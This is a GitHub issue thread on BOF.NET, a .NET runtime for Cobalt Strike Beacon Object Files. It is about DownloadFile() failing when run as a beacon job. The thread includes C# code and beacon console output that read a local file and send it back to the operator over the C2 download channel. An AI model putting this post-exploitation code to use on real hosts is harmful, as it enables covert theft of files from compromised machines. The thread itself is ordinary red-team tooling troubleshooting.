search

CCob / BOF.NET

A .NET Runtime for Cobalt Strike's Beacon Object Files
658 stars 94 forks source link

DownloadFile() not working with bofnet_job #2

Open williamknows opened 3 years ago

williamknows commented 3 years ago

Hey,

Really appreciate the effort that's gone into supporting the undocumented BOF functionality.

I've run into an issue with DownloadFile(). It appears to work fine with bofnet_execute but throws a NullReferenceException error with bofnet_job. This may be down to the way I'm using it. If so, would appreciate some code samples on usage if you have the time.

Test Code

using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using BOFNET;

namespace BOFNET_TestFileDownload
{
    class Program : BeaconObject
    {
        public Program(BeaconApi api) : base(api) { }
        public override void Go(string[] args)
        {
            MemoryStream ms = new MemoryStream();
            using (FileStream file = new FileStream(@"C:\temp\Testing.txt", FileMode.Open, FileAccess.Read))
                file.CopyTo(ms);
            ms.Position = 0;
            DownloadFile("testfile.txt", ms);
            ms.Close();

            BeaconConsole.WriteLine($"[+] File sent!");
        }

        static void Main(string[] args)
        {
        }
    }
}

Output

beacon> bofnet_execute BOFNET_TestFileDownload.Program
[*] Attempting to execute BOFNET BOFNET_TestFileDownload.Program
[+] host called home, sent: 6809 bytes
[*] started download of testfile.txt (24 bytes)
[*] download of testfile.txt is complete
[+] received output:
[+] File sent!

beacon> bofnet_job BOFNET_TestFileDownload.Program
[*] Attempting to start BOFNET BOFNET_TestFileDownload.Program as a job
[+] host called home, sent: 6836 bytes
[+] received output:
[+] Started Task BOFNET_TestFileDownload.Program with job id 4

beacon> bofnet_jobstatus 4
[*] Attempting to execute BOFNET BOFNET.Bofs.Jobs.JobStatus
[+] host called home, sent: 6808 bytes
[+] received output:
Type: Program, Id: 4, Active: False, Console Data: True
Job execution failed with exception:
System.NullReferenceException: Object reference not set to an instance of an object.
   at BOFNET.BeaconObject.DownloadFile(String fileName, Stream fileData)
   at BOFNET_TestFileDownload.Program.Go(String[] args)
   at BOFNET.BeaconJob.DoTask(Object args)

[+] Job completed and console drained, removing from active job list
CCob commented 3 years ago

Unfortunately it won't work as a job. The native BOF runtime is long gone when you start a job so you can't use any of the BOF APIs. It works for console output because it's cached and is only spewed out during a call to bofnet_jobstatus. I should put guard rails in place to prevent these undocumented extensions from working in a job.